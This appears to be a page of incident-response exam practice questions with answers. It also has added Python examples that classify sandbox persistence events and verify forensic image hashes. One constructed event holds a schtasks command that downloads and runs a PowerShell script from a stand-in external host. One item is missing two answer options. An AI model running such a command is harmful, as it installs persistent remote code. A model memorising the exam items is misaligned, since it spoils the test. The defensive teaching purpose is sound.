A security analyst is reviewing indicators of compromise (IOCs) from a recent phishing campaign. Which of the following is an example of an email-related IOC?

A.Domain name in the URL
B.Suspicious sender email address
C.IP address of the sender's mail server
D.File hash of an attachment
AnswerB

Sender email address is a direct email indicator.

Why this answer

Indicators taken from the message itself (sender address, reply-to, subject line, mailer headers) are email-specific IOCs, and a spoofed or look-alike sender address is the most common one used to detect phishing. The URL domain, the mail server's IP address and the attachment hash are network- and file-based indicators that merely arrive by email.

51
MCQmedium

An incident responder needs to collect forensic evidence from a server that was attacked. The evidence includes network connections, running processes, memory contents, and disk data. According to the order of volatility, which piece of evidence should the responder collect FIRST?

A.Memory contents
B.Network connections
C.Running processes
D.Disk data
AnswerB

Network connections are highly volatile and can disappear quickly, so they are collected first.

Why this answer

The order of volatility dictates that the most volatile data (e.g., CPU registers, network connections) should be collected first. Network connections change rapidly.

52
MCQeasy

During the preparation phase of the NIST SP 800-61 incident response lifecycle, a security analyst is tasked with ensuring the team has the necessary tools and resources. Which of the following is the MOST important activity to perform during this phase?

A.Sharing indicators of compromise with threat intel platforms
B.Developing and testing incident response playbooks
C.Conducting root cause analysis of past incidents
D.Analyzing malware samples in a sandbox
AnswerB

Playbooks are essential for consistent and effective response; testing ensures they work.

Why this answer

The preparation phase focuses on establishing policies, procedures, and resources. Developing and testing incident response playbooks ensures the team is ready to handle incidents efficiently.

53
MCQeasy

An organization uses MISP as its threat intelligence platform. After a security incident, the team wants to share IOCs with other trusted organizations. Which standard should they use to package and exchange the threat intelligence?

B.NetFlow
D.STIX/TAXII
AnswerD

STIX/TAXII are the standard formats for threat intelligence exchange.

Why this answer

STIX (Structured Threat Information Expression) is the standard for describing threat intelligence, and TAXII is the protocol for sharing it.

54
Multi-Selectmedium

An incident response team is conducting post-incident activities after a ransomware attack. The team wants to improve detection and response for future incidents. Which TWO actions are most appropriate for updating detection rules? (Select TWO.)

Select 2 answers
A.Conduct a tabletop exercise for the incident response team.
B.Increase the frequency of vulnerability scans.
C.Create YARA rules to identify the ransomware file hashes and patterns.
D.Share IOCs with external threat intelligence platforms.
E.Update the SIEM correlation rules to detect the TTPs observed.
AnswersC, E

YARA rules can detect the malware based on characteristics.

Why this answer

Updating SIEM correlation rules based on the attack TTPs and creating YARA rules for the ransomware family will enhance detection of similar threats.

55
Multi-Selectmedium

A security analyst is performing incident response for a suspected malware outbreak. Which TWO actions are examples of long-term containment? (Select TWO.)

Select 2 answers
A.Apply security patches to all systems
B.Isolate the affected network segment
C.Disable compromised user accounts
D.Block malicious IPs at the firewall
E.Rebuild compromised systems from known good media
AnswersA, E

Patching addresses the root cause and prevents recurrence.

Why this answer

In the SANS incident-handling model, short-term containment buys time (isolating the segment, blocking IPs, disabling accounts), while long-term containment applies more durable fixes, such as patching the exploited vulnerability and rebuilding compromised hosts from known-good media, so that clean systems can return to production. Options B, C and D are short-term measures.

56
MCQhard

An analyst is investigating a possible data exfiltration incident. The analyst has acquired a memory dump from the compromised system. Which of the following would be the BEST approach to extract evidence of exfiltration?

A.Calculating the MD5 hash of the memory dump and comparing it to known good hashes
B.Using a memory analysis framework like Volatility to analyze network connections and process memory
C.Searching the memory dump for strings containing 'password'
D.Rebooting the system and capturing a new memory dump
AnswerB

Volatility can recover network connections, sockets, and process memory that may contain exfiltrated data.

Why this answer

Memory analysis frameworks such as Volatility can list processes, recover network connections and sockets (for example the windows.pslist and windows.netscan plugins in Volatility 3) and dump process memory that may contain staged data, credentials or the exfiltration tool itself. Hashing the dump (A) only proves its integrity, a blind search for 'password' (C) misses encoded or compressed data, and rebooting (D) destroys the evidence.

57
MCQmedium

During post-incident activities, the security team reviews metrics. Which metric measures the average time taken to detect an incident?

A.MTTR
B.SLA
C.RTO
D.MTTD
AnswerD

MTTD stands for Mean Time to Detect.

Why this answer

MTTD (Mean Time to Detect) measures detection efficiency. MTTR is for response/repair.

58
Multi-Selectmedium

During dynamic analysis of a suspicious file in a sandbox environment, which THREE behaviors are considered indicators of compromise (IOCs) that suggest malicious activity? (Choose THREE.)

Select 3 answers
A.Creating a registry run key to achieve persistence.
B.Outbound network connections to a known malicious IP.
C.The file reading its own content.
D.Dropping an executable file in the startup folder.
E.Opening a text file that was already present.
AnswersA, B, D

Persistence mechanisms are common in malware.

Why this answer

Dynamic analysis monitors behavior. Outbound connections to known bad IPs, creation of suspicious registry keys, and dropping files in startup folders are common malicious behaviors.

59
MCQmedium

During a phishing incident, an analyst extracts a URL from the email body and searches VirusTotal. The URL is associated with a credential harvesting page. Which type of indicator is this URL?

A.Indicator of Compromise (IOC)
B.Indicator of Attack (IOA)
C.Campaign
D.TTP
AnswerA

The URL is a specific artifact that indicates a compromise.

Why this answer

The URL is an observable that indicates malicious activity and can be used to detect and block further phishing attempts, making it an IOC.

60
Multi-Selectmedium

A security analyst is investigating a phishing incident that resulted in credential theft. Which TWO actions should the analyst take as part of short-term containment? (Choose two.)

Select 2 answers
A.Block the phishing domain at the email gateway
B.Rebuild the affected workstations from a clean image
C.Conduct a full vulnerability scan of the network
D.Change all user passwords in the domain
E.Disable the compromised user accounts
AnswersA, E

Correct. This prevents more users from clicking.

Why this answer

Short-term containment aims to stop the immediate threat. Disabling accounts and blocking malicious domains are quick containment actions.

61
MCQeasy

During the preparation phase of the NIST SP 800-61 incident response lifecycle, which of the following is the MOST important activity to ensure effective incident response?

A.Using YARA rules to detect malware in the environment
B.Implementing network segmentation to limit lateral movement
C.Conducting a root cause analysis after each incident
D.Creating and training the incident response team
AnswerD

This is a core preparation activity that ensures the team is ready to respond.

Why this answer

Preparation includes creating and training the incident response team, acquiring tools, and establishing procedures. A well-trained team is critical to executing the response effectively.

62
MCQhard

During a forensic investigation, an analyst needs to acquire volatile memory from a compromised Linux server running a critical application. The server cannot be powered off. Which tool should the analyst use to capture memory with the least impact on the system?

A.LiME
B.avml
C.WinPmem
D.dd
AnswerA

LiME is designed for Linux memory acquisition and minimizes interference with the running system.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module that dumps physical memory to a file or over the network with a small footprint, and it is the classic live-acquisition tool for Linux. AVML (option B) is Microsoft's userland acquirer that reads /proc/kcore or /dev/crash without loading a module; it is a legitimate alternative in practice, but the expected exam answer is LiME. WinPmem is Windows-only, and dd against /dev/mem is restricted by CONFIG_STRICT_DEVMEM on modern kernels and would not yield a complete image.

63
MCQmedium

After containing a ransomware incident, the incident response team is conducting post-incident activities. Which action is MOST important to prevent a similar attack in the future?

A.Sharing IOCs with other organizations via a threat intelligence platform
B.Reimaging all affected systems
C.Performing a root cause analysis and implementing remediation
D.Updating the incident response plan
AnswerC

This directly addresses the cause of the incident.

Why this answer

Conducting a root cause analysis identifies the underlying vulnerability or weakness that allowed the attack, enabling targeted remediation.

64
Multi-Selecthard

During a forensic investigation, an analyst must preserve evidence in accordance with forensically sound procedures. Which THREE of the following practices should the analyst follow? (Select THREE.)

Select 3 answers
A.Run a full antivirus scan on the target drive
B.Document all actions taken in a chain of custody form
C.Use a write blocker when imaging a hard drive
D.Create a cryptographic hash of the original media before imaging
E.Boot the system to ensure it is operational
AnswersB, C, D

Chain of custody ensures evidence admissibility.

Why this answer

Forensically sound procedures include using a write blocker so imaging cannot alter the source, hashing the original media and the image to prove they match, and documenting every step in the chain of custody. Running an antivirus scan or booting the system would change timestamps and file contents, and a scanner may quarantine the very artifacts under investigation.

65
MCQhard

A security analyst is performing dynamic malware analysis using a sandbox. The analyst observes that the malware creates a scheduled task that executes a PowerShell command to download a payload from a remote server. Which of the following behavioral IOCs should be prioritized for detection?

A.The domain name of the remote server
B.The hash of the initial malware sample
C.The IP address of the remote server
D.The creation of a scheduled task
AnswerD

Scheduled task creation is a persistent and observable behavior across many environments.

Why this answer

The scheduled task creation is a persistent mechanism that can be detected via monitoring for new scheduled tasks.

66
MCQeasy

A security analyst receives an alert about a possible ransomware outbreak. Which short-term containment action should be performed FIRST to prevent further spread?

A.Disable the user account
B.Rebuild the system
C.Update antivirus signatures
D.Isolate the system from the network
AnswerD

Network isolation stops lateral movement and C2 communication immediately.

Why this answer

Network isolation (disconnecting the affected system from the network) is a quick short-term containment step that stops the ransomware from communicating with C2 or spreading laterally.

67
MCQmedium

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a finance workstation to a known malicious IP address at 2:00 AM. The analyst checks the firewall logs and sees a single connection. Which action should the analyst take FIRST according to NIST SP 800-61?

A.Validate the incident by reviewing additional data sources.
B.Run a full antivirus scan on the workstation.
C.Isolate the workstation from the network immediately.
D.Notify law enforcement per the incident response plan.
AnswerA

Validation ensures the alert is a true incident, reducing false positives.

Why this answer

NIST SP 800-61 emphasizes that during detection and analysis, the first step is to validate the incident as a true positive before escalating or containing. The analyst should confirm the alert is not a false positive by gathering additional evidence.

68
MCQmedium

A security analyst is triaging an alert indicating that a user's workstation has been infected with ransomware. The file server shows signs of encryption. The analyst needs to contain the incident. Which action should the analyst take FIRST to minimize damage?

A.Running a full antivirus scan on the workstation
B.Disabling the user's Active Directory account
C.Rebuilding the workstation from a known good image
D.Disconnecting the workstation from the network
AnswerD

This is a short-term containment action that isolates the compromised system.

Why this answer

Disconnecting the infected workstation from the network stops the ransomware from spreading to other systems via network shares.

69
MCQmedium

An incident responder is called to a server room where a critical database server is exhibiting signs of compromise. The responder must preserve evidence while preventing further damage. Which of the following is a short-term containment strategy that also preserves evidence?

A.Reboot the server into safe mode.
B.Disconnect the network cable from the server.
C.Power off the server to freeze the system state.
D.Run a memory dump with WinPmem before any action.
AnswerB

This isolates the server while preserving the current system state for forensics.

Why this answer

Disconnecting the network cable (Option B) is the correct short-term containment strategy because it immediately isolates the compromised database server from the network, stopping further lateral movement or data exfiltration, while leaving the host powered on so that volatile evidence (memory contents, running processes, injected code) remains available for acquisition. Established connections will time out once the link is down, so record them (for example with netstat) as part of the memory capture that should follow; pulling the cable still alters far less than a reboot or power-off, which is what matters for evidence integrity.

Exam trap

Cisco often tests the distinction between containment and evidence preservation, and the trap here is that candidates confuse 'preserving evidence' with 'freezing the system state' (Option C) or 'acquiring memory first' (Option D). The question asks for a containment strategy; of the four options, network isolation is the only one that stops active damage while keeping the volatile evidence recoverable.

How to eliminate wrong answers

Option A is wrong because rebooting into safe mode will overwrite volatile memory (RAM) and modify system logs, destroying critical forensic evidence such as active network connections, running malware processes, and encryption keys. Option C is wrong because powering off the server causes a hard shutdown that erases all volatile memory data and may trigger anti-forensic mechanisms (e.g., self-deleting scripts), losing the most time-sensitive evidence. Option D is wrong because running a memory dump with WinPmem before any containment action is a forensic acquisition step, not a containment strategy; it takes time and does not stop ongoing damage or network-based attacks.

70
MCQmedium

During dynamic malware analysis in a sandbox, an analyst observes that the malware attempts to connect to a remote IP address on port 443, modifies the Windows registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and drops a DLL in the system32 folder. Which type of IOC is most indicative of persistence?

A.The registry modification to the Run key
B.The network connection over port 443
C.The remote IP address
D.The dropped DLL file hash
AnswerA

Run keys are classic persistence indicators.

Why this answer

The registry modification to HKCU\Software\Microsoft\Windows\CurrentVersion\Run is the most indicative of persistence because Windows launches every value under this key when that user logs on (HKLM\Software\Microsoft\Windows\CurrentVersion\Run does the same for all users). By adding a value here, the malware ensures it is re-executed after every reboot and logon, which is the definition of persistence. In contrast, network connections and file drops are common during execution but do not by themselves guarantee re-execution after a reboot.

Exam trap

Cisco often tests the distinction between indicators of activity (network connections, file drops) and indicators of persistence (registry Run keys, scheduled tasks, services), and the trap here is that candidates confuse a common malware behavior (like connecting to a C2 server) with a mechanism that ensures the malware runs again after reboot.

How to eliminate wrong answers

Option B is wrong because a network connection over port 443 (HTTPS) indicates command-and-control communication or data exfiltration, not a mechanism to survive a reboot. Option C is wrong because the remote IP address is merely a destination for network activity and provides no information about automatic re-execution. Option D is wrong because the dropped DLL file hash is a file-based indicator of compromise (IOC) that identifies the malware sample, but the file alone does not ensure it will be loaded again after a restart without a persistence mechanism like a Run key or service.
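Worked example (added here, not part of the original question set or any vendor's code) covering the behaviors in questions 58, 65 and 70: a classifier that takes sandbox or endpoint telemetry and separates persistence indicators (Run and RunOnce keys, service ImagePath values, the Startup folder, schtasks /create) from execution artifacts and network activity, so the persistence IOCs can be prioritized for detection rules. The events are a constructed, simplified Sysmon-style list; the event IDs (1 process create, 3 network connect, 11 file create, 13 registry value set) are Sysmon's, but the field names are assumptions, and 203.0.113.10 is a documentation-range address used as the stand-in C2 server. The technique labels are MITRE ATT&CK IDs.

```python
"""Sort sandbox / endpoint telemetry into behavioural IOC categories.

Added example for this page, not code from the page or from any vendor.
SANDBOX_EVENTS is a constructed, simplified Sysmon-style event list; the
field names are assumptions. Persistence indicators are separated from
execution and network activity so they can be prioritised for detection.
"""
import ipaddress
import re

# RFC 1918 ranges plus loopback; anything else is treated as an external destination.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\", re.I)
SERVICE_KEY_RE = re.compile(r"\\SYSTEM\\CurrentControlSet\\Services\\[^\\]+\\ImagePath$", re.I)
STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)

# Constructed sandbox run reproducing the behaviours described in questions 58, 65 and 70.
SANDBOX_EVENTS = [
    {"event_id": 13, "target_object": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\victim\AppData\Roaming\svch0st.exe"},
    {"event_id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks.exe /create /tn Updater /tr "powershell.exe -w hidden -c iwr '
                     r'http://203.0.113.10/p.ps1 -OutFile C:\Users\victim\p.ps1" /sc minute /mo 5'},
    {"event_id": 11, "target_filename": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows"
                                        r"\Start Menu\Programs\Startup\update.exe"},
    {"event_id": 13, "target_object": r"HKLM\SYSTEM\CurrentControlSet\Services\UpdSvc\ImagePath",
     "details": r"C:\Users\victim\AppData\Roaming\svch0st.exe"},
    {"event_id": 3, "destination_ip": "203.0.113.10", "destination_port": 443},
    {"event_id": 3, "destination_ip": "10.0.0.5", "destination_port": 445},
    {"event_id": 11, "target_filename": r"C:\Users\victim\AppData\Local\Temp\inv.exe.tmp"},
    {"event_id": 13, "target_object": r"HKCU\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems",
     "details": "0x00000001"},
]


def classify(event):
    """Return (category, ATT&CK technique or None, evidence string) for one event."""
    eid = event.get("event_id")
    if eid == 13:  # registry value set
        target = event["target_object"]
        if RUN_KEY_RE.search(target):
            return "persistence", "T1547.001", target
        if SERVICE_KEY_RE.search(target):
            return "persistence", "T1543.003", target
        return "uncategorized", None, target
    if eid == 11:  # file created
        path = event["target_filename"]
        if STARTUP_DIR_RE.search(path):
            return "persistence", "T1547.001", path
        return "execution", None, path  # a dropped file is activity, not persistence
    if eid == 1:  # process created
        cmd = event["command_line"]
        if SCHTASKS_CREATE_RE.search(cmd):
            return "persistence", "T1053.005", cmd
        return "execution", None, cmd
    if eid == 3:  # network connection
        dst = ipaddress.ip_address(event["destination_ip"])
        evidence = f"{dst}:{event['destination_port']}"
        if any(dst in net for net in INTERNAL_NETS):
            return "internal_network", None, evidence
        return "command_and_control", "T1071", evidence  # outbound to an external host
    return "uncategorized", None, ""


def summarize(events):
    """Group classified events by category so persistence IOCs can be reviewed first."""
    summary = {k: [] for k in ("persistence", "command_and_control", "execution",
                               "internal_network", "uncategorized")}
    for ev in events:
        category, technique, evidence = classify(ev)
        summary[category].append({"event_id": ev.get("event_id"),
                                  "technique": technique, "evidence": evidence})
    return summary


if __name__ == "__main__":
    for category, items in summarize(SANDBOX_EVENTS).items():
        print(category, items)
```

The split matches how the three questions grade the behaviors: the Run key, the service ImagePath, the Startup-folder drop and the schtasks /create command are persistence and become the durable detections; the HTTPS connection to the external address is C2 activity; the temp-file drop and the SMB connection to an internal host are recorded but not treated as persistence. The external-versus-internal test deliberately uses explicit RFC 1918 ranges rather than the ipaddress module's is_global flag, which also treats documentation ranges as non-global.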

71
MCQmedium

An analyst is investigating a suspected data breach and needs to preserve network logs. Which of the following actions is MOST appropriate?

A.Delete old logs to free space for new logs
B.Perform a packet capture (pcap) and store it on write-protected media
C.Forward logs to a remote syslog server
D.Copy the log files to a USB drive and analyze them
AnswerB

Creating a pcap and storing on write-protected media preserves the evidence in its original state.

Why this answer

To preserve network logs, the analyst should create a forensic copy (e.g., using netflow or packet capture) and store it on write-once media to prevent tampering.

72
MCQmedium

During a forensic investigation, an analyst creates a disk image using dd with a SHA256 hash. Later, the analyst needs to verify the integrity of the image before analysis. Which command should the analyst use to compare the original hash with a newly computed hash?

A.md5sum original.dd
B.dd if=image.dd | sha256sum
C.sha256sum image.dd
D.chksum -a sha256 image.dd
AnswerC

Computing the SHA256 hash of the image and comparing with the original ensures integrity.

Why this answer

Recomputing the hash with sha256sum and comparing it to the original verifies that the image has not been altered.
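Worked example (added here, not part of the original question set) for questions 64 and 72: the hash-and-verify workflow behind dd plus sha256sum, including the step the question leaves implicit, hashing the source media before imaging and comparing it with the image hash so the acquisition itself is proven faithful. The manifest is written in sha256sum's "<hex>  <name>" format so `sha256sum -c` can check the same file. The "media" is a constructed byte string in a temporary directory, and the tampering step flips one byte to show the re-verification fail.

```python
"""Hash-and-verify workflow for a forensic image.

Added example for this page, not code from the page. It mirrors dd followed
by sha256sum: hash the source media, copy it, hash the image, record the
manifest, and re-verify later. The media is constructed in a temp directory.
"""
import hashlib
import os
import shutil
import tempfile

CHUNK = 1024 * 1024  # stream in 1 MiB chunks so multi-GB images need not fit in RAM


def sha256_file(path):
    """Hex SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def write_manifest(path, manifest_path):
    """Record the hash in sha256sum's "<hex>  <name>" format and return the digest."""
    digest = sha256_file(path)
    with open(manifest_path, "w") as m:
        m.write(f"{digest}  {os.path.basename(path)}\n")
    return digest


def verify_manifest(manifest_path, directory):
    """Return {name: bool} per manifest entry, as sha256sum -c reports OK/FAILED."""
    results = {}
    with open(manifest_path) as m:
        for line in m:
            line = line.rstrip("\n")
            if not line:
                continue
            digest, _, name = line.partition("  ")
            results[name] = sha256_file(os.path.join(directory, name)) == digest.lower()
    return results


def acquire_and_verify(source, image, manifest):
    """Hash the source, copy it to the image, hash the image; return both hashes and whether they match."""
    src_hash = sha256_file(source)
    shutil.copyfile(source, image)  # stands in for dd if=<source> of=<image>
    img_hash = write_manifest(image, manifest)
    return src_hash, img_hash, src_hash == img_hash


def demo():
    """Run the whole workflow on constructed media and return the observed results."""
    workdir = tempfile.mkdtemp()
    try:
        source = os.path.join(workdir, "sdb")  # stands in for /dev/sdb (constructed)
        image = os.path.join(workdir, "image.dd")
        manifest = os.path.join(workdir, "image.dd.sha256")
        with open(source, "wb") as f:
            f.write(b"EVIDENCE" * 4096)  # constructed media content
        _src, img_hash, acquired_ok = acquire_and_verify(source, image, manifest)
        before = verify_manifest(manifest, workdir)["image.dd"]
        # Simulate tampering or bit rot: flip one byte of the image, then re-verify.
        with open(image, "r+b") as f:
            f.seek(100)
            f.write(b"x")
        after = verify_manifest(manifest, workdir)["image.dd"]
        return {"acquired_ok": acquired_ok, "verified_before": before,
                "verified_after_tamper": after, "hash_len": len(img_hash)}
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    print(demo())
```

Two checks matter in practice and both are here: the source hash must equal the image hash immediately after acquisition (otherwise the image is not a faithful copy, regardless of what later verification says), and every later verification must recompute the hash of the whole file rather than trusting the manifest. A single changed byte fails the second check, which is why a hash taken before analysis is the only thing that lets you prove the image was not altered.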

73
Multi-Selectmedium

A security team is responding to a suspected data breach involving exfiltration of customer data via email. During the containment phase, which TWO actions should the team perform to preserve evidence while preventing further data loss?

Select 2 answers
A.Disable the compromised user account.
B.Take a memory dump of the email server.
C.Rebuild the email server from backup.
D.Notify all customers immediately.
E.Apply all available patches to the email server.
AnswersA, B

Disabling the account stops further unauthorized access and data exfiltration.

Why this answer

A memory dump of the email server captures volatile evidence (active sessions, running processes and possibly the exfiltration tooling) before it is lost, and disabling the compromised account stops further unauthorized access and sending. Rebuilding (C) and patching (E) would alter or destroy that evidence, and customer notification (D) belongs to later phases once the scope of the breach is known.

74
MCQmedium

An organization has been experiencing repeated phishing attacks that bypass email filters. The incident response team wants to enhance detection by creating rules based on characteristics of the phishing emails. Which of the following IOCs would be most effective for detecting similar phishing campaigns?

A.Registry keys modified by the payload
B.File hashes of attached malware
C.IP addresses of the phishing servers
D.Email subject lines and sender domain
AnswerD

These are common across phishing campaigns and can be used to filter emails.

Why this answer

Email indicators such as subject lines, sender addresses, or embedded URLs are directly observable in emails and help identify phishing patterns.

75
Multi-Selecteasy

A security analyst is reviewing IOCs from a threat intelligence feed. The analyst wants to enrich the IOCs using open-source tools. Which THREE tools are commonly used for IOC enrichment? (Select three.)

Select 3 answers
A.WHOIS
B.Wireshark
C.VirusTotal
D.Shodan
E.Nmap
AnswersA, C, D

WHOIS looks up domain registration data.

Why this answer

VirusTotal provides file and URL reputation. Shodan gives information about exposed services. WHOIS reveals domain registration details.

These are standard enrichment sources.
